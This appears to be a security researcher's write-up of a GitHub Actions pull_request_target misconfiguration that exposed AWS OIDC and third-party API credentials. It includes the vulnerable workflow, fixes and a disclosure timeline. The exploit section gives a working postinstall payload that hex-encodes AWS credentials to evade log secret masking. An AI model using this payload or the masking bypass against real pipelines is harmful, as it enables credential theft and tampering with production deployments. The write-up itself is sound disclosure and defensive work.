While doing research for a follow-up to my GCP Workload Identity post (coming soon), I kept noticing pull_request_target misuses alongside the WIF findings. They're a different class of problem. The WIF issues were authentication misconfigurations: you could authenticate as someone else's service account from an unrelated repository. pull_request_target is a workflow trigger designed for a specific use case that is very easy to get wrong in a way that hands attacker-controlled code to a runner with your secrets already in the environment. I found one repository where all the pieces were in place.
The Vulnerability
pull_request_target is a GitHub Actions trigger that was introduced to allow workflows on fork pull requests to access repository secrets. Unlike the standard pull_request trigger, it runs in the context of the base repository, which means it has access to secrets, OIDC tokens, and elevated permissions even when the PR comes from a fork.
The problem is that it is very easy to misconfigure. The dangerous pattern is straightforward: if your workflow checks out attacker-controlled code and then does anything with secrets or credentials, that code runs with access to them.
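As a sketch of that pattern (a hypothetical workflow, not the one described below; the secret name and checkout ref are illustrative):

```yaml
# Hypothetical minimal example of the anti-pattern
on: pull_request_target   # runs in the base repo context, secrets available

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Explicitly checking out the PR head brings attacker-controlled
      # files into the workspace
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      # Lifecycle scripts in the attacker's package.json now run with
      # the secret in the environment
      - run: npm install
        env:
          SOME_SECRET: ${{ secrets.SOME_SECRET }}
```

Either ingredient alone is fine; it's the combination of a privileged trigger and untrusted code on disk that creates the exposure.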
What I Found
A well-known open source project had a workflow that combined four things in a way that made it exploitable by anyone with a GitHub account.
1. An unsafe trigger
```yaml
on:
  pull_request_target:
    branches: [main]
```

Many repos add a gate here: a label check, an author association check, something that requires maintainer approval before the workflow runs. This one had none of that. Any fork PR against main fires it immediately.
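For comparison, an author-association gate can look something like this (illustrative snippet, not from the affected repo; it doesn't make unsafe checkouts safe, but it blocks drive-by fork PRs):

```yaml
jobs:
  process-pull-request:
    # Only run automatically for PRs opened by trusted associations;
    # anything else waits for a maintainer to intervene
    if: >-
      contains(fromJSON('["OWNER", "MEMBER", "COLLABORATOR"]'),
               github.event.pull_request.author_association)
```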
2. A custom action
```yaml
- name: Merge test branch
  uses: org/merge-test-branch@v2.7
```

After this step, every file in the workspace reflects the attacker's fork, including package.json.
3. AWS OIDC credentials loaded into the environment
```yaml
- name: Configure AWS credentials
  uses: aws-actions/configure-aws-credentials@v6
  with:
    role-to-assume: arn:aws:iam::REDACTED:role/github-actions-oidc-role
    aws-region: us-east-1
```

This puts AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN into the runner environment for all subsequent steps.
4. npm ci runs with attacker code on disk
```shell
npm ci
```

npm ci respects lifecycle scripts in package.json. Because step 2 already replaced package.json with the attacker's version, any preinstall, install, or postinstall script runs as the runner user, with live AWS credentials in the environment.
There were also several third-party API keys exported into the same environment at the same time: image hosting, a CRM, and a captcha service.
Exploit
The exploit is simple. Fork the repository, add a postinstall script to package.json, open a PR. No maintainer interaction required.
```json
{
  "scripts": {
    "postinstall": "node -e \"const n=['AWS_ACCESS_KEY_ID','AWS_SECRET_ACCESS_KEY','AWS_SESSION_TOKEN'];const k=Object.fromEntries(n.map(x=>[x,Buffer.from(process.env[x]||'').toString('hex')]));console.log('POC_CREDS:'+JSON.stringify(k))\""
  }
}
```

The hex encoding is needed to bypass GitHub Actions' secret masking, which replaces raw credential strings in logs but doesn't match encoded versions. In the past I've used base64 for this, but it didn't work this time; maybe they've caught on to that.
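To illustrate why this works, here is a standalone sketch with a made-up credential value (not the real payload or a real key):

```python
# Why hex encoding slips past literal secret masking: the masker replaces
# exact occurrences of the secret string in log output, but the hex form
# shares no substring with the raw value.
import json

secret = "ASIAEXAMPLEKEYID"  # made-up credential value
encoded = secret.encode().hex()
assert secret not in encoded  # nothing for the masker to match

# What the attacker does on their side with the captured log line:
log_line = "POC_CREDS:" + json.dumps({"AWS_ACCESS_KEY_ID": encoded})
payload = json.loads(log_line.split("POC_CREDS:", 1)[1])
recovered = bytes.fromhex(payload["AWS_ACCESS_KEY_ID"]).decode()
assert recovered == secret
```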
When the PR is opened, the workflow fires automatically. npm ci runs the postinstall script. The credentials land in the build log.
I tested this against a sandbox replica of the vulnerable workflow pointing at a personal AWS role with minimal permissions. The credentials came back immediately.
```
AWS_ACCESS_KEY_ID: ASIA...
AWS_SECRET_ACCESS_KEY: R2tq...
AWS_SESSION_TOKEN: IQoJ... (full STS session token)
```

Confirmed live with aws sts get-caller-identity. In the real attack this would be the organisation's production deployment role, not a sandbox.
Impact
The AWS role was the same one used to deploy the organisation's production website on every push to main. At minimum it had the permissions required to run that deployment, so an attacker could modify the live site during their session window.
As well as AWS, the same attack exposed credentials for the image hosting provider, the CRM, and the captcha service. All were exported into the environment in the same step as npm ci.
The workflow also ran on a self-hosted runner. Those don't get wiped between jobs the way GitHub-hosted runners do. A postinstall hook that managed to escape the runner and write a file outside the workspace could maintain a foothold across subsequent runs, but I didn't test this.
Fix
The cleanest fix is to replace pull_request_target with pull_request. GitHub's platform enforces that fork PRs under pull_request cannot access id-token: write, so the AWS credential step simply fails. The trade-off is that preview deploys stop working for fork PRs, which is the correct security posture.
```yaml
on:
  pull_request:
    branches: [main]
```

If fork PR preview deploys are a hard requirement, the workflow needs an explicit maintainer approval gate, such as a maintainer-applied label, before any code from the PR touches the workspace, and the label must be automatically removed after each run to prevent reuse.
```yaml
on:
  pull_request_target:
    types: [labeled]

jobs:
  process-pull-request:
    if: github.event.label.name == 'safe-to-deploy'
```

The broader lesson is that pull_request_target should be treated like running untrusted code with your secrets. Because that is exactly what it is.
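For the removal half of that gate, a final step along these lines works (illustrative; it assumes the gh CLI is available on the runner and reuses the safe-to-deploy label from above):

```yaml
# Strip the approval label after every run, success or failure, so a
# later push to the same PR cannot reuse a stale approval
- name: Remove approval label
  if: always()
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
  run: >-
    gh pr edit ${{ github.event.number }}
    --repo ${{ github.repository }}
    --remove-label safe-to-deploy
```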
Full Workflow
For reference, here is the complete vulnerable workflow with identifying details redacted.
```yaml
name: PullRequestAction

on:
  pull_request_target:
    branches: [main]

concurrency:
  group: ${{ github.workflow }}-${{ github.event.number }}
  cancel-in-progress: true

env:
  NODE_VERSION: "20.19.0"

permissions:
  contents: read
  statuses: write
  pull-requests: write
  id-token: write

jobs:
  process-pull-request:
    runs-on: self-hosted
    steps:
      - name: Fetch git repository
        uses: actions/checkout@v6.0.2
        with:
          fetch-depth: "0"

      - name: Restore main cache first
        uses: actions/cache/restore@v5
        id: main-cache
        with:
          path: cache
          key: cache-main

      - name: Restore PR cache
        uses: actions/cache/restore@v5
        id: pr-cache
        with:
          path: cache
          key: cache-${{ github.sha }}-${{ github.run_id }}
          restore-keys: |
            cache-${{ github.sha }}-
            cache-main

      - name: Initialise status
        run: |
          export STATUSES_URL=$(jq -r ".pull_request.statuses_url" $GITHUB_EVENT_PATH)
          export DATA='{"state": "pending", "target_url": "", "context": "Deploy preview", "description": "Waiting for site to build"}'
          curl -s -S -H "Content-Type: application/json" -H "Authorization: token $TOKEN" -d "$DATA" "$STATUSES_URL"
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Merge test branch
        uses: org/merge-test-branch@v2.7

      - name: Set up Node.js
        uses: actions/setup-node@v6
        with:
          node-version: ${{ env.NODE_VERSION }}
          cache: "npm"

      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v6
        with:
          role-to-assume: arn:aws:iam::REDACTED:role/github-actions-oidc-role
          aws-region: us-east-1

      - name: Deploy Preview
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          export NODE_OPTIONS=--experimental-wasm-modules
          export IS_PUBLIC=true
          export IS_PREVIEW=true
          export CLOUDINARY_CLOUD_NAME=${{ secrets.CLOUDINARY_CLOUD_NAME }}
          export CLOUDINARY_API_KEY=${{ secrets.CLOUDINARY_API_KEY }}
          export CLOUDINARY_API_SECRET=${{ secrets.CLOUDINARY_API_SECRET }}
          export CLOUDINARY_URL=${{ secrets.CLOUDINARY_URL }}
          export PUBLIC_CLOUDINARY_CLOUD_NAME=${{ secrets.PUBLIC_CLOUDINARY_CLOUD_NAME }}
          export PUBLIC_FRIENDLY_CAPTCHA_SITEKEY=${{ vars.FRIENDLY_CAPTCHA_SITEKEY }}
          export FRIENDLY_CAPTCHA_API_KEY=${{ secrets.FRIENDLY_CAPTCHA_API_KEY }}
          export PIPELINE_CRM_ENDPOINT=${{ vars.PIPELINE_CRM_ENDPOINT }}
          export PIPELINE_CRM_W2LID=${{ vars.PIPELINE_CRM_W2LID }}
          export PIPELINE_CRM_API_KEY=${{ secrets.PIPELINE_CRM_API_KEY }}
          export PIPELINE_CRM_APP_KEY=${{ secrets.PIPELINE_CRM_APP_KEY }}
          export DECAP_DOMAIN=${{ vars.DECAP_DOMAIN }}
          export CUSTOM_DOMAIN="REDACTED-pr-${{ github.event.number }}.example.com"
          npm ci

      - uses: actions/cache/save@v5
        with:
          path: cache
          key: cache-${{ github.sha }}-${{ github.run_id }}
```
Disclosure
10th April: Initial disclosure to their security contact
23rd April: Followed up, no response received
24th April: Fix deployed